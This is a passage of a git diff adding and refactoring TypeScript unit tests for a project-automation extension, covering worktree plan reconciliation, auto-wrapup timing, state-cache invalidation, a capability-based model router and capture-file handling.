-        "# S01 Plan\n- [x] **T01:** task one\n- [x] **T02:** task two\n- [ ] **T03:** task three\n",
-      );
-
-      // Write integration-branch plan to git so milestone branch starts from it
-      run(`git add .`, tempDir);
-      run(`git commit -m "add plan with T01 and T02 checked" --allow-empty`, tempDir);
-
-      // Create milestone branch with only T01 [x] (simulating crash before T02 commit)
-      const milestoneBranch = "milestone/M004";
-      run(`git checkout -b ${milestoneBranch}`, tempDir);
-      mkdir(planDir, { recursive: true });
-      write(
-        join(tempDir, planRelPath),
-        "# S01 Plan\n- [x] **T01:** task one\n- [ ] **T02:** task two\n- [ ] **T03:** task three\n",
-      );
-      run(`git add .`, tempDir);
-      run(`git commit -m "milestone: only T01 checked"`, tempDir);
-      run(`git checkout main`, tempDir);
-
-      // Restore project root plan (T01+T02 [x]) — simulates syncStateToProjectRoot
-      write(
-        join(tempDir, planRelPath),
-        "# S01 Plan\n- [x] **T01:** task one\n- [x] **T02:** task two\n- [ ] **T03:** task three\n",
-      );
-
-      // Create worktree re-attached to existing milestone branch (T02 still [ ] in branch)
-      const wtPath = createAutoWorktree(tempDir, "M004");
-
-      try {
-        const wtPlanPath = join(wtPath, planRelPath);
-        assertTrue(existsSync(wtPlanPath), "plan file exists in worktree after re-attach");
-
-        const wtPlan = read(wtPlanPath, "utf-8");
-        assertTrue(wtPlan.includes("- [x] **T02:"), "T02 should be [x] after reconciliation (was [ ] on branch)");
-        assertTrue(wtPlan.includes("- [x] **T01:"), "T01 stays [x]");
-        assertTrue(wtPlan.includes("- [ ] **T03:"), "T03 stays [ ] (not in root either)");
-      } finally {
-        teardownAutoWorktree(tempDir, "M004");
-      }
-    }
-
-  } finally {
-    // Always restore cwd and clean up
-    process.chdir(savedCwd);
-    if (tempDir && existsSync(tempDir)) {
-      rmSync(tempDir, { recursive: true, force: true });
-    }
-  }
-
-  report();
-}
-
-main();
diff --git a/src/resources/extensions/gsd/tests/auto-wrapup-inflight-guard.test.ts b/src/resources/extensions/gsd/tests/auto-wrapup-inflight-guard.test.ts
new file mode 100644
index 000000000..5ad5311b2
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/auto-wrapup-inflight-guard.test.ts
@@ -0,0 +1,107 @@
+// GSD-2 — Regression tests for #3512: gsd-auto-wrapup mid-turn interruption
+// Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join } from "node:path";
+
+const autoTimersPath = join(import.meta.dirname, "..", "auto-timers.ts");
+const autoTimersSrc = readFileSync(autoTimersPath, "utf-8");
+
+const autoPath = join(import.meta.dirname, "..", "auto.ts");
+const autoSrc = readFileSync(autoPath, "utf-8");
+
+const runUnitPath = join(import.meta.dirname, "..", "auto", "run-unit.ts");
+const runUnitSrc = readFileSync(runUnitPath, "utf-8");
+
+describe("#3512: gsd-auto-wrapup must not interrupt in-flight tool calls", () => {
+  test("soft timeout wrapup gates triggerTurn on getInFlightToolCount() === 0", () => {
+    // The soft timeout sendMessage must NOT use a hardcoded `triggerTurn: true`.
+    // It must check getInFlightToolCount() before deciding whether to trigger.
+    // Use the section marker comment to isolate the soft timeout block.
+    const startMarker = "── 1. Soft timeout warning";
+    const endMarker = "── 2. Idle watchdog";
+    const softTimeoutSection = autoTimersSrc.slice(
+      autoTimersSrc.indexOf(startMarker),
+      autoTimersSrc.indexOf(endMarker),
+    );
+    assert.ok(
+      softTimeoutSection.length > 0,
+      "Could not locate soft timeout section",
+    );
+
+    // Must reference getInFlightToolCount to gate the trigger
+    assert.ok(
+      softTimeoutSection.includes("getInFlightToolCount"),
+      "Soft timeout wrapup must gate triggerTurn behind getInFlightToolCount() check",
+    );
+
+    // Must NOT have a hardcoded triggerTurn: true
+    assert.ok(
+      !softTimeoutSection.includes("triggerTurn: true"),
+      "Soft timeout wrapup must not use hardcoded triggerTurn: true",
+    );
+  });
+
+  test("context-pressure wrapup gates triggerTurn on getInFlightToolCount() === 0", () => {
+    // The context budget sendMessage must NOT use a hardcoded `triggerTurn: true`.
+    // Use the section marker to isolate the context-pressure block.
+    const startMarker = "── 4. Context-pressure continue-here monitor";
+    const contextSection = autoTimersSrc.slice(
+      autoTimersSrc.indexOf(startMarker),
+    );
+    assert.ok(
+      contextSection.length > 0,
+      "Could not locate context budget section",
+    );
+
+    // Must reference getInFlightToolCount to gate the trigger
+    assert.ok(
+      contextSection.includes("getInFlightToolCount"),
+      "Context budget wrapup must gate triggerTurn behind getInFlightToolCount() check",
+    );
+
+    // Must NOT have a hardcoded triggerTurn: true
+    assert.ok(
+      !contextSection.includes("triggerTurn: true"),
+      "Context budget wrapup must not use hardcoded triggerTurn: true",
+    );
+  });
+});
+
+describe("#3512: pauseAuto and stopAuto must flush queued follow-up messages", () => {
+  test("stopAuto calls clearQueue()", () => {
+    // stopAuto must flush queued messages to prevent late async_job_result
+    // notifications from triggering extra LLM turns after stop.
+    const stopAutoSection = autoSrc.slice(
+      autoSrc.indexOf("export async function stopAuto("),
+      autoSrc.indexOf("export async function pauseAuto("),
+    );
+    assert.ok(stopAutoSection, "Could not locate stopAuto function");
+    assert.ok(
+      stopAutoSection.includes("clearQueue"),
+      "stopAuto must call clearQueue() to flush queued follow-up messages",
+    );
+  });
+
+  test("pauseAuto calls clearQueue()", () => {
+    // pauseAuto must also flush queued messages — same issue as stopAuto.
+    const pauseAutoSection = autoSrc.slice(
+      autoSrc.indexOf("export async function pauseAuto("),
+    );
+    assert.ok(pauseAutoSection, "Could not locate pauseAuto function");
+    assert.ok(
+      pauseAutoSection.includes("clearQueue"),
+      "pauseAuto must call clearQueue() to flush queued follow-up messages",
+    );
+  });
+
+  test("run-unit.ts still has its existing clearQueue() call (baseline)", () => {
+    // Verify the original clearQueue pattern in run-unit.ts hasn't been removed.
+    assert.ok(
+      runUnitSrc.includes("clearQueue"),
+      "run-unit.ts must retain its clearQueue() call after unit completion",
+    );
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/cache-staleness-regression.test.ts b/src/resources/extensions/gsd/tests/cache-staleness-regression.test.ts
index b9d513f7c..f7dadd422 100644
--- a/src/resources/extensions/gsd/tests/cache-staleness-regression.test.ts
+++ b/src/resources/extensions/gsd/tests/cache-staleness-regression.test.ts
@@ -12,15 +12,14 @@
  * Pattern: derive state → write file → invalidate cache → derive again → verify update
  */
 
-import { mkdtempSync, mkdirSync, writeFileSync, rmSync, existsSync } from 'node:fs';
+import { describe, test, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, mkdirSync, writeFileSync, rmSync } from 'node:fs';
 import { join } from 'node:path';
 import { tmpdir } from 'node:os';
 
 import { deriveState, invalidateStateCache } from '../state.ts';
 import { invalidateAllCaches } from '../cache.ts';
-import { createTestContext } from './test-helpers.ts';
-
-const { assertEq, assertTrue, report } = createTestContext();
 
 function createBase(): string {
   const base = mkdtempSync(join(tmpdir(), 'gsd-cache-stale-'));
@@ -44,11 +43,9 @@ function writeSliceFile(base: string, mid: string, sid: string, suffix: string,
   writeFileSync(join(dir, `${sid}-${suffix}.md`), content);
 }
 
-async function main(): Promise<void> {
+describe("cache-staleness-regression", () => {
 
-  // ─── 1. Regression #1240: New roadmap detected after cache invalidation ─
-  console.log('\n=== 1. #1240: roadmap written after first derive → detected after invalidation ===');
-  {
+  test("#1240: roadmap written after first derive → detected after invalidation", async () => {
     const base = createBase();
     try {
       // Step 1: Create milestone with just context (no roadmap)
@@ -57,7 +54,7 @@ async function main(): Promise<void> {
       invalidateAllCaches();
       invalidateStateCache();
       const state1 = await deriveState(base);
-      assertEq(state1.phase, 'pre-planning', 'initial: pre-planning (no roadmap)');
+      assert.strictEqual(state1.phase, 'pre-planning', 'initial: pre-planning (no roadmap)');
 
       // Step 2: Write roadmap (simulating what the LLM does during planning)
       const roadmap = [
@@ -80,16 +77,14 @@ async function main(): Promise<void> {
       invalidateAllCaches();
       invalidateStateCache();
       const state2 = await deriveState(base);
-      assertEq(state2.phase, 'planning', '#1240: after roadmap write + invalidation → planning phase');
-      assertEq(state2.activeSlice?.id, 'S01', '#1240: S01 is now the active slice');
+      assert.strictEqual(state2.phase, 'planning', '#1240: after roadmap write + invalidation → planning phase');
+      assert.strictEqual(state2.activeSlice?.id, 'S01', '#1240: S01 is now the active slice');
     } finally {
       cleanup(base);
     }
-  }
+  });
 
-  // ─── 2. Regression #1249: Slice context detected after cache invalidation ─
-  console.log('\n=== 2. #1249: slice context written mid-loop → detected after invalidation ===');
-  {
+  test("#1249: slice context written mid-loop → detected after invalidation", async () => {
     const base = createBase();
     try {
       // Create a milestone in needs-discussion phase (CONTEXT-DRAFT, no CONTEXT)
@@ -100,7 +95,7 @@ async function main(): Promise<void> {
       invalidateAllCaches();
       invalidateStateCache();
       const state1 = await deriveState(base);
-      assertEq(state1.phase, 'needs-discussion', 'initial: needs-discussion');
+      assert.strictEqual(state1.phase, 'needs-discussion', 'initial: needs-discussion');
 
       // Simulate: discussion completes, CONTEXT.md is written
       writeMilestoneFile(base, 'M001', 'CONTEXT', '# M001: Test\n\nFull context after discussion.\n');
@@ -112,21 +107,16 @@ async function main(): Promise<void> {
       invalidateAllCaches();
       invalidateStateCache();
       const state2 = await deriveState(base);
-      // Should now be pre-planning (has context, but no roadmap yet)
-      // Actually needs-discussion won't trigger because now CONTEXT exists
-      // The state should advance past needs-discussion
-      assertTrue(
+      assert.ok(
         state2.phase !== 'needs-discussion',
         '#1249: after context write + invalidation → not stuck in needs-discussion',
       );
     } finally {
       cleanup(base);
     }
-  }
+  });
 
-  // ─── 3. State cache TTL expires naturally ─────────────────────────────
-  console.log('\n=== 3. state cache TTL: fresh reads after 100ms ===');
-  {
+  test("state cache TTL: fresh reads after 100ms", async () => {
     const base = createBase();
     try {
       writeMilestoneFile(base, 'M001', 'CONTEXT', '# M001\n\nDesc.\n');
@@ -134,7 +124,7 @@ async function main(): Promise<void> {
       invalidateAllCaches();
       invalidateStateCache();
       const state1 = await deriveState(base);
-      assertEq(state1.phase, 'pre-planning', 'initial: pre-planning');
+      assert.strictEqual(state1.phase, 'pre-planning', 'initial: pre-planning');
 
       // Write roadmap immediately
       writeMilestoneFile(base, 'M001', 'ROADMAP', [
@@ -157,15 +147,13 @@ async function main(): Promise<void> {
       invalidateAllCaches();
       invalidateStateCache();
       const state3 = await deriveState(base);
-      assertEq(state3.phase, 'planning', 'after TTL expiry + invalidation → planning');
+      assert.strictEqual(state3.phase, 'planning', 'after TTL expiry + invalidation → planning');
     } finally {
       cleanup(base);
     }
-  }
+  });
 
-  // ─── 4. Task completion detection after file write ────────────────────
-  console.log('\n=== 4. task marked done in plan → state advances ===');
-  {
+  test("task marked done in plan → state advances", async () => {
     const base = createBase();
     try {
       writeMilestoneFile(base, 'M001', 'CONTEXT', '# M001\n\nDesc.\n');
@@ -194,7 +182,7 @@ async function main(): Promise<void> {
       invalidateAllCaches();
       invalidateStateCache();
       const state1 = await deriveState(base);
-      assertEq(state1.activeTask?.id, 'T01', 'initial: T01 is active task');
+      assert.strictEqual(state1.activeTask?.id, 'T01', 'initial: T01 is active task');
 
       // Mark T01 as done by rewriting the plan
       writeSliceFile(base, 'M001', 'S01', 'PLAN', [
@@ -210,15 +198,13 @@ async function main(): Promise<void> {
       invalidateAllCaches();
       invalidateStateCache();
       const state2 = await deriveState(base);
-      assertEq(state2.activeTask?.id, 'T02', 'after T01 done → T02 is active task');
+      assert.strictEqual(state2.activeTask?.id, 'T02', 'after T01 done → T02 is active task');
     } finally {
       cleanup(base);
     }
-  }
+  });
 
-  // ─── 5. Slice completion detection ────────────────────────────────────
-  console.log('\n=== 5. all tasks done → summarizing phase ===');
-  {
+  test("all tasks done → summarizing phase", async () => {
     const base = createBase();
     try {
       writeMilestoneFile(base, 'M001', 'CONTEXT', '# M001\n\nDesc.\n');
@@ -245,7 +231,7 @@ async function main(): Promise<void> {
       invalidateAllCaches();
       invalidateStateCache();
       const state1 = await deriveState(base);
-      assertEq(state1.phase, 'executing', 'initial: executing');
+      assert.strictEqual(state1.phase, 'executing', 'initial: executing');
 
       // Mark task done
       writeSliceFile(base, 'M001', 'S01', 'PLAN', [
@@ -260,15 +246,13 @@ async function main(): Promise<void> {
       invalidateAllCaches();
       invalidateStateCache();
       const state2 = await deriveState(base);
-      assertEq(state2.phase, 'summarizing', 'after all tasks done → summarizing');
+      assert.strictEqual(state2.phase, 'summarizing', 'after all tasks done → summarizing');
     } finally {
       cleanup(base);
     }
-  }
+  });
 
-  // ─── 6. Roadmap slice marked done → advance to next slice ─────────────
-  console.log('\n=== 6. roadmap slice marked [x] → next slice active ===');
-  {
+  test("roadmap slice marked [x] → next slice active", async () => {
     const base = createBase();
     try {
       writeMilestoneFile(base, 'M001', 'CONTEXT', '# M001\n\nDesc.\n');
@@ -285,7 +269,7 @@ async function main(): Promise<void> {
       invalidateAllCaches();
       invalidateStateCache();
       const state1 = await deriveState(base);
-      assertEq(state1.activeSlice?.id, 'S01', 'initial: S01 active');
+      assert.strictEqual(state1.activeSlice?.id, 'S01', 'initial: S01 active');
 
       // Mark S01 as done in roadmap
       writeMilestoneFile(base, 'M001', 'ROADMAP', [
@@ -302,16 +286,9 @@ async function main(): Promise<void> {
       invalidateAllCaches();
       invalidateStateCache();
       const state2 = await deriveState(base);
-      assertEq(state2.activeSlice?.id, 'S02', 'after S01 done → S02 active');
+      assert.strictEqual(state2.activeSlice?.id, 'S02', 'after S01 done → S02 active');
     } finally {
       cleanup(base);
     }
-  }
-
-  report();
-}
-
-main().catch((error) => {
-  console.error(error);
-  process.exit(1);
+  });
 });
diff --git a/src/resources/extensions/gsd/tests/capability-router.test.ts b/src/resources/extensions/gsd/tests/capability-router.test.ts
new file mode 100644
index 000000000..751fc6e11
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/capability-router.test.ts
@@ -0,0 +1,347 @@
+// GSD Extension — Capability-Aware Router Tests
+// Tests for new capability scoring functions and data tables (Plan 01-01)
+
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+
+import {
+  scoreModel,
+  computeTaskRequirements,
+  scoreEligibleModels,
+  getEligibleModels,
+  resolveModelForComplexity,
+  MODEL_CAPABILITY_PROFILES,
+  BASE_REQUIREMENTS,
+  defaultRoutingConfig,
+} from "../model-router.js";
+import type { ModelCapabilities, DynamicRoutingConfig, RoutingDecision } from "../model-router.js";
+
+// ─── scoreModel ──────────────────────────────────────────────────────────────
+
+describe("scoreModel", () => {
+  const sonnetProfile: ModelCapabilities = {
+    coding: 85, debugging: 80, research: 75, reasoning: 80,
+    speed: 60, longContext: 75, instruction: 85,
+  };
+
+  test("produces correct weighted average for single dimension", () => {
+    // Only coding weight 1.0 → result should be the coding score
+    const score = scoreModel(sonnetProfile, { coding: 1.0 });
+    assert.equal(score, 85);
+  });
+
+  test("produces correct weighted average for two dimensions (coding 0.9, instruction 0.7)", () => {
+    // (0.9*85 + 0.7*85) / (0.9+0.7) = (76.5+59.5)/1.6 = 136/1.6 = 85.0
+    const score = scoreModel(sonnetProfile, { coding: 0.9, instruction: 0.7 });
+    assert.ok(Math.abs(score - 85.0) < 0.01, `Expected ~85.0, got ${score}`);
+  });
+
+  test("returns 50 when requirements is empty", () => {
+    const score = scoreModel(sonnetProfile, {});
+    assert.equal(score, 50);
+  });
+
+  test("uses 50 as fallback for unknown dimension in requirements", () => {
+    // 'unknown' dimension not in profile → treated as 50
+    const score = scoreModel(sonnetProfile, { coding: 0.5, unknown: 1.0 } as any);
+    // (0.5*85 + 1.0*50) / (0.5+1.0) = (42.5+50)/1.5 = 92.5/1.5 = 61.67
+    assert.ok(score > 61 && score < 62, `Expected ~61.67, got ${score}`);
+  });
+});
+
+// ─── computeTaskRequirements ─────────────────────────────────────────────────
+
+describe("computeTaskRequirements", () => {
+  test("execute-task with no metadata returns base requirements", () => {
+    const req = computeTaskRequirements("execute-task", undefined);
+    assert.deepStrictEqual(req, { coding: 0.9, instruction: 0.7, speed: 0.3 });
+  });
+
+  test("execute-task with docs tag returns docs-adjusted requirements", () => {
+    const req = computeTaskRequirements("execute-task", { tags: ["docs"] });
+    assert.equal(req.instruction, 0.9);
+    assert.equal(req.coding, 0.3);
+    assert.equal(req.speed, 0.7);
+  });
+
+  test("execute-task with readme tag returns docs-adjusted requirements", () => {
+    const req = computeTaskRequirements("execute-task", { tags: ["readme"] });
+    assert.equal(req.instruction, 0.9);
+  });
+
+  test("execute-task with concurrency keyword boosts debugging and reasoning", () => {
+    const req = computeTaskRequirements("execute-task", { complexityKeywords: ["concurrency"] });
+    assert.equal(req.debugging, 0.9);
+    assert.equal(req.reasoning, 0.8);
+  });
+
+  test("execute-task with compatibility keyword boosts debugging and reasoning", () => {
+    const req = computeTaskRequirements("execute-task", { complexityKeywords: ["compatibility"] });
+    assert.equal(req.debugging, 0.9);
+    assert.equal(req.reasoning, 0.8);
+  });
+
+  test("execute-task with migration keyword boosts reasoning and coding", () => {
+    const req = computeTaskRequirements("execute-task", { complexityKeywords: ["migration"] });
+    assert.equal(req.reasoning, 0.9);
+    assert.equal(req.coding, 0.8);
+  });
+
+  test("execute-task with architecture keyword boosts reasoning and coding", () => {
+    const req = computeTaskRequirements("execute-task", { complexityKeywords: ["architecture"] });
+    assert.equal(req.reasoning, 0.9);
+    assert.equal(req.coding, 0.8);
+  });
+
+  test("execute-task with fileCount >= 6 boosts coding and reasoning", () => {
+    const req = computeTaskRequirements("execute-task", { fileCount: 8 });
+    assert.equal(req.coding, 0.9);
+    assert.equal(req.reasoning, 0.7);
+  });
+
+  test("execute-task with fileCount exactly 6 triggers large-file boost", () => {
+    const req = computeTaskRequirements("execute-task", { fileCount: 6 });
+    assert.equal(req.coding, 0.9);
+    assert.equal(req.reasoning, 0.7);
+  });
+
+  test("execute-task with estimatedLines >= 500 boosts coding and reasoning", () => {
+    const req = computeTaskRequirements("execute-task", { estimatedLines: 500 });
+    assert.equal(req.coding, 0.9);
+    assert.equal(req.reasoning, 0.7);
+  });
+
+  test("research-milestone with no metadata returns base requirements", () => {
+    const req = computeTaskRequirements("research-milestone", undefined);
+    assert.deepStrictEqual(req, { research: 0.9, longContext: 0.7, reasoning: 0.5 });
+  });
+
+  test("unknown unit type returns default reasoning requirement", () => {
+    const req = computeTaskRequirements("unknown-type", undefined);
+    assert.deepStrictEqual(req, { reasoning: 0.5 });
+  });
+});
+
+// ─── MODEL_CAPABILITY_PROFILES ───────────────────────────────────────────────
+
+describe("MODEL_CAPABILITY_PROFILES", () => {
+  test("contains all 9 required models", () => {
+    const required = [
+      "claude-opus-4-6", "claude-sonnet-4-6", "claude-haiku-4-5",
+      "gpt-4o", "gpt-4o-mini", "gemini-2.5-pro", "gemini-2.0-flash",
+      "deepseek-chat", "o3",
+    ];
+    for (const model of required) {
+      assert.ok(MODEL_CAPABILITY_PROFILES[model], `Missing profile for ${model}`);
+    }
+  });
+
+  test("each profile has all 7 capability dimensions", () => {
+    const dims: Array<keyof ModelCapabilities> = [
+      "coding", "debugging", "research", "reasoning",
+      "speed", "longContext", "instruction",
+    ];
+    for (const [modelId, profile] of Object.entries(MODEL_CAPABILITY_PROFILES)) {
+      for (const dim of dims) {
+        assert.ok(profile[dim] !== undefined, `${modelId} missing dimension ${dim}`);
+        assert.ok(profile[dim] >= 0 && profile[dim] <= 100, `${modelId}.${dim} out of range`);
+      }
+    }
+  });
+
+  test("claude-opus-4-6 has high reasoning and coding", () => {
+    const opus = MODEL_CAPABILITY_PROFILES["claude-opus-4-6"];
+    assert.ok(opus.reasoning >= 90, `Expected reasoning >= 90, got ${opus.reasoning}`);
+    assert.ok(opus.coding >= 90, `Expected coding >= 90, got ${opus.coding}`);
+  });
+
+  test("claude-haiku-4-5 has high speed but lower reasoning", () => {
+    const haiku = MODEL_CAPABILITY_PROFILES["claude-haiku-4-5"];
+    assert.ok(haiku.speed >= 90, `Expected speed >= 90, got ${haiku.speed}`);
+    assert.ok(haiku.reasoning < 70, `Expected reasoning < 70, got ${haiku.reasoning}`);
+  });
+});
+
+// ─── BASE_REQUIREMENTS ───────────────────────────────────────────────────────
+
+describe("BASE_REQUIREMENTS", () => {
+  test("contains all 11 unit types", () => {
+    const required = [
+      "execute-task", "research-milestone", "research-slice",
+      "plan-milestone", "plan-slice", "replan-slice",
+      "reassess-roadmap", "complete-slice", "run-uat",
+      "discuss-milestone", "complete-milestone",
+    ];
+    for (const unitType of required) {
+      assert.ok(BASE_REQUIREMENTS[unitType], `Missing requirements for ${unitType}`);
+    }
+  });
+});
+
+// ─── scoreEligibleModels ─────────────────────────────────────────────────────
+
+describe("scoreEligibleModels", () => {
+  test("returns array sorted by score descending", () => {
+    const requirements = { research: 0.9, longContext: 0.7, reasoning: 0.5 };
+    const results = scoreEligibleModels(["claude-sonnet-4-6", "gpt-4o"], requirements);
+    assert.ok(results.length === 2);
+    assert.ok(results[0].score >= results[1].score, "Should be sorted descending by score");
+  });
+
+  test("returns single model when only one eligible", () => {
+    const requirements = { coding: 0.9 };
+    const results = scoreEligibleModels(["claude-sonnet-4-6"], requirements);
+    assert.equal(results.length, 1);
+    assert.equal(results[0].modelId, "claude-sonnet-4-6");
+  });
+
+  test("models without profiles get uniform 50s score", () => {
+    const requirements = { coding: 1.0 };
+    const results = scoreEligibleModels(["unknown-model-xyz"], requirements);
+    assert.equal(results[0].score, 50);
+  });
+
+  test("when two models score within 2 points, prefers cheaper model", () => {
+    // gemini-2.0-flash is cheaper than gpt-4o-mini ($0.0001 vs $0.00015)
+    // Use a requirement that causes similar scores for both
+    const requirements = { speed: 1.0 };
+    const results = scoreEligibleModels(["gpt-4o-mini", "gemini-2.0-flash"], requirements);
+    // Both are high-speed: gpt-4o-mini=90, gemini-2.0-flash=95 — scores differ by 5, not within 2
+    // So top should be gemini-2.0-flash by score
+    assert.equal(results[0].modelId, "gemini-2.0-flash");
+  });
+
+  test("tie-breaks by lexicographic model ID when cost and score are equal", () => {
+    // Use models without cost entries — both get Infinity cost
+    const requirements = { coding: 1.0 };
+    const results = scoreEligibleModels(["model-z", "model-a"], requirements);
+    // Both unknown → score=50, cost=Infinity → tiebreak by ID
+    assert.equal(results[0].modelId, "model-a");
+  });
+
+  test("scoreEligibleModels respects capabilityOverrides", () => {
+    const requirements = { coding: 1.0 };
+    // Override claude-sonnet-4-6's coding to 30 (worse)
+    const results = scoreEligibleModels(
+      ["claude-sonnet-4-6", "gpt-4o"],
+      requirements,
+      { "claude-sonnet-4-6": { coding: 30 } },
+    );
+    // gpt-4o coding=80 should beat overridden sonnet coding=30
+    assert.equal(results[0].modelId, "gpt-4o");
+  });
+});
+
+// ─── getEligibleModels ───────────────────────────────────────────────────────
+
+describe("getEligibleModels", () => {
+  const MODELS = [
+    "claude-opus-4-6",      // heavy
+    "claude-sonnet-4-6",    // standard
+    "claude-haiku-4-5",     // light
+    "gpt-4o-mini",          // light
+  ];
+
+  test("returns light-tier models sorted by cost when no explicit config", () => {
+    const config: DynamicRoutingConfig = defaultRoutingConfig();
+    const result = getEligibleModels("light", MODELS, config);
+    assert.ok(result.length >= 1);
+    // All results should be light-tier
+    for (const id of result) {
+      assert.ok(
+        ["claude-haiku-4-5", "gpt-4o-mini"].includes(id),
+        `Expected light-tier model, got ${id}`,
+      );
+    }
+  });
+
+  test("returns explicit tier_models when configured and available", () => {
+    const config: DynamicRoutingConfig = {
+      ...defaultRoutingConfig(),
+      tier_models: { light: "gpt-4o-mini" },
+    };
+    const result = getEligibleModels("light", MODELS, config);
+    assert.deepStrictEqual(result, ["gpt-4o-mini"]);
+  });
+
+  test("returns empty array when no eligible models for tier", () => {
+    const config: DynamicRoutingConfig = defaultRoutingConfig();
+    // Only heavy model available, requesting light
+    const result = getEligibleModels("light", ["claude-opus-4-6"], config);
+    assert.equal(result.length, 0);
+  });
+});
+
+// ─── DynamicRoutingConfig extension ─────────────────────────────────────────
+
+describe("DynamicRoutingConfig.capability_routing", () => {
+  test("defaultRoutingConfig includes capability_routing: true", () => {
+    const config = defaultRoutingConfig();
+    assert.equal(config.capability_routing, true);
+  });
+});
+
+// ─── RoutingDecision.selectionMethod ─────────────────────────────────────────
+
+describe("RoutingDecision.selectionMethod", () => {
+  const MODELS = ["claude-opus-4-6", "claude-sonnet-4-6", "claude-haiku-4-5", "gpt-4o-mini"];
+
+  function makeClassification(tier: "light" | "standard" | "heavy") {
+    return { tier, reason: "test", downgraded: false };
+  }
+
+  test("returns selectionMethod: tier-only when routing is disabled", () => {
+    const config = { ...defaultRoutingConfig(), enabled: false };
+    const result: RoutingDecision = resolveModelForComplexity(
+      makeClassification("light"),
+      { primary: "claude-opus-4-6", fallbacks: [] },
+      config,
+      MODELS,
+    );
+    assert.equal(result.selectionMethod, "tier-only");
+  });
+
+  test("returns selectionMethod: tier-only for no phase config passthrough", () => {
+    const config = { ...defaultRoutingConfig(), enabled: true };
+    const result: RoutingDecision = resolveModelForComplexity(
+      makeClassification("light"),
+      undefined,
+      config,
+      MODELS,
+    );
+    assert.equal(result.selectionMethod, "tier-only");
+  });
+
+  test("returns selectionMethod: tier-only for unknown model passthrough", () => {
+    const config = { ...defaultRoutingConfig(), enabled: true };
+    const result: RoutingDecision = resolveModelForComplexity(
+      makeClassification("light"),
+      { primary: "custom-provider/my-model-v3", fallbacks: [] },
+      config,
+      ["custom-provider/my-model-v3", ...MODELS],
+    );
+    assert.equal(result.selectionMethod, "tier-only");
+  });
+
+  test("returns selectionMethod: tier-only for no-downgrade passthrough", () => {
+    const config = { ...defaultRoutingConfig(), enabled: true };
+    const result: RoutingDecision = resolveModelForComplexity(
+      makeClassification("heavy"),
+      { primary: "claude-opus-4-6", fallbacks: [] },
+      config,
+      MODELS,
+    );
+    assert.equal(result.selectionMethod, "tier-only");
+  });
+
+  test("returns selectionMethod: tier-only when downgraded", () => {
+    const config = { ...defaultRoutingConfig(), enabled: true };
+    const result: RoutingDecision = resolveModelForComplexity(
+      makeClassification("light"),
+      { primary: "claude-opus-4-6", fallbacks: [] },
+      config,
+      MODELS,
+    );
+    assert.equal(result.selectionMethod, "tier-only");
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/captures.test.ts b/src/resources/extensions/gsd/tests/captures.test.ts
index f18e7c49c..e8497e6fc 100644
--- a/src/resources/extensions/gsd/tests/captures.test.ts
+++ b/src/resources/extensions/gsd/tests/captures.test.ts
@@ -19,8 +19,11 @@ import {
   appendCapture,
   loadAllCaptures,
   loadPendingCaptures,
+  loadActionableCaptures,
   hasPendingCaptures,
   markCaptureResolved,
+  markCaptureExecuted,
+  stampCaptureMilestone,
   resolveCapturesPath,
   parseTriageOutput,
 } from "../captures.ts";
@@ -36,176 +39,156 @@ function makeTempDir(prefix: string): string {
 
 // ─── appendCapture ────────────────────────────────────────────────────────────
 
-test("captures: appendCapture creates CAPTURES.md on first call", () => {
+test("captures: appendCapture creates CAPTURES.md on first call", (t) => {
   const tmp = makeTempDir("cap-create");
-  try {
-    const id = appendCapture(tmp, "first thought");
-    assert.ok(id.startsWith("CAP-"), "ID should start with CAP-");
-    assert.ok(
-      existsSync(join(tmp, ".gsd", "CAPTURES.md")),
-      "CAPTURES.md should exist",
-    );
-    const content = readFileSync(join(tmp, ".gsd", "CAPTURES.md"), "utf-8");
-    assert.ok(content.includes("# Captures"), "should have header");
-    assert.ok(content.includes(`### ${id}`), "should have entry heading");
-    assert.ok(
-      content.includes("**Text:** first thought"),
-      "should have text field",
-    );
-    assert.ok(
-      content.includes("**Status:** pending"),
-      "should have pending status",
-    );
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
+
+  const id = appendCapture(tmp, "first thought");
+  assert.ok(id.startsWith("CAP-"), "ID should start with CAP-");
+  assert.ok(
+    existsSync(join(tmp, ".gsd", "CAPTURES.md")),
+    "CAPTURES.md should exist",
+  );
+  const content = readFileSync(join(tmp, ".gsd", "CAPTURES.md"), "utf-8");
+  assert.ok(content.includes("# Captures"), "should have header");
+  assert.ok(content.includes(`### ${id}`), "should have entry heading");
+  assert.ok(
+    content.includes("**Text:** first thought"),
+    "should have text field",
+  );
+  assert.ok(
+    content.includes("**Status:** pending"),
+    "should have pending status",
+  );
 });
 
-test("captures: appendCapture appends to existing file", () => {
+test("captures: appendCapture appends to existing file", (t) => {
   const tmp = makeTempDir("cap-append");
-  try {
-    const id1 = appendCapture(tmp, "thought one");
-    const id2 = appendCapture(tmp, "thought two");
-    assert.notStrictEqual(id1, id2, "IDs should be unique");
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
 
-    const content = readFileSync(join(tmp, ".gsd", "CAPTURES.md"), "utf-8");
-    assert.ok(content.includes(`### ${id1}`), "should have first entry");
-    assert.ok(content.includes(`### ${id2}`), "should have second entry");
-    assert.ok(
-      content.includes("**Text:** thought one"),
-      "should have first text",
-    );
-    assert.ok(
-      content.includes("**Text:** thought two"),
-      "should have second text",
-    );
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
+  const id1 = appendCapture(tmp, "thought one");
+  const id2 = appendCapture(tmp, "thought two");
+  assert.notStrictEqual(id1, id2, "IDs should be unique");
+
+  const content = readFileSync(join(tmp, ".gsd", "CAPTURES.md"), "utf-8");
+  assert.ok(content.includes(`### ${id1}`), "should have first entry");
+  assert.ok(content.includes(`### ${id2}`), "should have second entry");
+  assert.ok(
+    content.includes("**Text:** thought one"),
+    "should have first text",
+  );
+  assert.ok(
+    content.includes("**Text:** thought two"),
+    "should have second text",
+  );
 });
 
 // ─── loadAllCaptures / loadPendingCaptures ────────────────────────────────────
 
-test("captures: loadAllCaptures parses entries correctly", () => {
+test("captures: loadAllCaptures parses entries correctly", (t) => {
